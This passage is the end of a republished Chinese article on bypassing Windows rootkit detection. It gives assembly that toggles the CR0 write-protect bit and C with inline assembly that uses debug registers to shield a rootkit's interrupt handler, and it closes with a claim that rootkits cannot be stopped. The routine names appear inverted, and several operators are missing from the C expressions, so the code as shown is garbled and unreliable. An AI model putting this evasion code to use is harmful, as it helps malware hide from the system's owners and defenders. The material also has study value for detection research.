绕过WindowsRootkit检测系统

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
EnablePageProtection PROC

push eax
mov eax,CR0
and eax,0FFFEFFFFh
mov CR0,eax
pop eax
ret

EnablePageProtection ENDP
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DisablePageProtection PROC

push eax
mov eax,CR0
or eax,NOT 0FFFEFFFFh
mov CR0,eax
pop eax
ret

DisablePageProtection ENDP
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

[Rootkit的未来]

很不幸，这种方法使EPA变得没用。如果微软不改变它的安全结构，没有一种办法能在未来阻止rookits。未来的rootkit会在分页机制上大有作为，这种有无限种可能性。一旦进入Ring 0，那么永远在Ring 0。

[参考]

[1] Joanna Rutkowska,Advanced Windows 2000 Rootkit Detection(高级Rootkit检测技术)
[2] Joanna Rutkowska,Detecting Windows Server Compromises with PatchFinder2
[3] IA32 Intel Architeture Softwares Developer's Manual, vol 1-3

注1：

这个图无法画出，就是画出了读者也不一定能看得明白(因为画的实在太简单了-_-)。我在这里补充一下用调试寄存器保护地址的原理。首先是DR0-DR4这4个调试寄存器保存了4个线性地址，然后通过DR7寄存器的相关位并检查DR6寄存器的相关位来对这4个地址进行相关操作。参考以下代码:

#define DB_PROT_EXEC 0
#define DB_PROT_WRITE 1
#define DB_PROT_RW 3

#define DB_DR0 0
#define DB_DR1 1
#define DB_DR2 2
#define DB_DR3 3

#define DB_LEN_1B 0
#define DB_LEN_2B 1
#define DB_LEN_4B 3

int dbProtect (int reg, int addr, int len, int protection) {
unsigned int dr7mask;

switch (reg) {
case 0:
__asm {
mov eax, addr;
mov DR0, eax;
}
break;
case 1:
__asm {
mov eax, addr;
mov DR1, eax;
}
break;
case 2:
__asm {
mov eax, addr;
mov DR2, eax;
}
break;
case 3:
__asm {
mov eax, addr;
mov DR3, eax;
}
break;
}

dr7mask = 0x2<<(reg*2);
dr7mask |= (( (len<<2) protection) << (16 (4*reg)));
__asm {
mov eax, DR7;
or eax, dr7mask;
mov DR7, eax;
}

return 1;
}

int dbSetGeneralProtection () {

__asm {
mov eax, DR7;
or eax, 0x1000;
mov DR7, eax;
}

return 1;
}

然后在中断处理程序中还要加入下面几句代码:
mov eax, DR6;
test ax, 0x100f; // BD |B3|B2|B1|B0
.
.
mov eax, DR6; // 检查DR6的BS(单步)位
test ah, 0x40;

最后决定对3个地址进行不同程度的保护:
dbProtect (DB_DR0, (int)getIntGateAddr(NT_DEBUG_INT), DB_LEN_4B, DB_PROT_WRITE);
dbProtect (DB_DR1, (int)getIntGateAddr(NT_DEBUG_INT) 4, DB_LEN_4B, DB_PROT_WRITE);
dbProtect (DB_DR2, (int)NewDebugHandler1, DB_LEN_4B, DB_PROT_RW);

对DR6和DR7相关位的作用不太熟悉的可以去查Intel的手册15.2节<Debug Registers>。


后级：

如果你对分页机制不太熟悉的话，可以参考我朋友JIURL的4篇很详细地介绍分页机制的文章：《JIURL玩玩Win2k内存篇 分页机制(1-4)》，网址：http://jiurl.yeah.net；或者WebCrazy的《小议分页机制》，网址：http://webcrazy.yeah.net。

水平有限，欢迎大家指出错漏之处。QQ:27324838 Email:kinvis@hotmail.com 关闭本页

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!